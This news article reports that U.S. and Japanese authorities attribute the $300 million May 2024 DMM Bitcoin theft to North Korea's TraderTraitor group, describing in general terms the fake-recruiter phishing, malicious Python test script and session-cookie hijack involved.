- North Korean cyber actors have been identified as the perpetrators of the $300 million hack on the Japanese exchange DMM Bitcoin
- The FBI, Department of Defense Cyber Crime Center (DC3), and Japan’s National Police Agency (NPA) have identified the perpetrators as the state-backed TraderTraitor group
- The May 2024 theft was executed through a sophisticated phishing attack involving malicious Python scripts
North Korean cyber actors have been identified as the perpetrators of a sophisticated phishing attack resulting in the theft of $300 million from DMM Bitcoin, a Japan-based cryptocurrency company. The FBI, Department of Defense Cyber Crime Center (DC3), and Japan’s National Police Agency (NPA) have collaborated to identify and expose the state-backed TraderTraitor group as the agents. The attack involved deceptive recruitment tactics and the use of malicious Python scripts to compromise employee credentials.
Hacked Through Recruitment Process
In late March 2024, a North Korean cyber actor posing as a recruiter on LinkedIn contacted an employee at Ginco, a Japan-based enterprise cryptocurrency wallet software company. The attacker sent the employee a URL linked to a malicious Python script, disguised as a pre-employment test hosted on GitHub. The employee, who had access to Ginco’s wallet management system, inadvertently executed the script, leading to the compromise of their credentials.
By mid-May 2024, the TraderTraitor actors exploited session cookie information to impersonate the compromised employee, gaining unauthorized access to Ginco’s unencrypted communications system. In late May, they manipulated a legitimate transaction request by a DMM employee, resulting in the unauthorized transfer of 4,502.9 BTC, valued at over $300 million at the time, to wallets controlled by the attackers.
Crime Agencies Point the Finger
The FBI, DC3, and NPA have been actively working to expose and combat North Korea’s use of illicit activities, including cybercrime and cryptocurrency theft, to generate revenue for the regime. In a joint statement, they emphasized their commitment to pursuing such cyber threats:
The FBI, National Police Agency of Japan, and other U.S. government and international partners will continue to expose and combat North Korea’s use of illicit activities—including cybercrime and cryptocurrency theft—to generate revenue for the regime.
This incident underscores the persistent threat posed by North Korean cyber actors to the global financial system, particularly the cryptocurrency sector. The TraderTraitor group, also known as Jade Sleet, UNC4899, and Slow Pisces, is notorious for targeted social engineering attacks aimed at multiple employees within the same organization. Authorities continue to investigate and implement measures to prevent such incidents, urging companies to enhance their cybersecurity protocols and employee training to defend against sophisticated phishing attacks.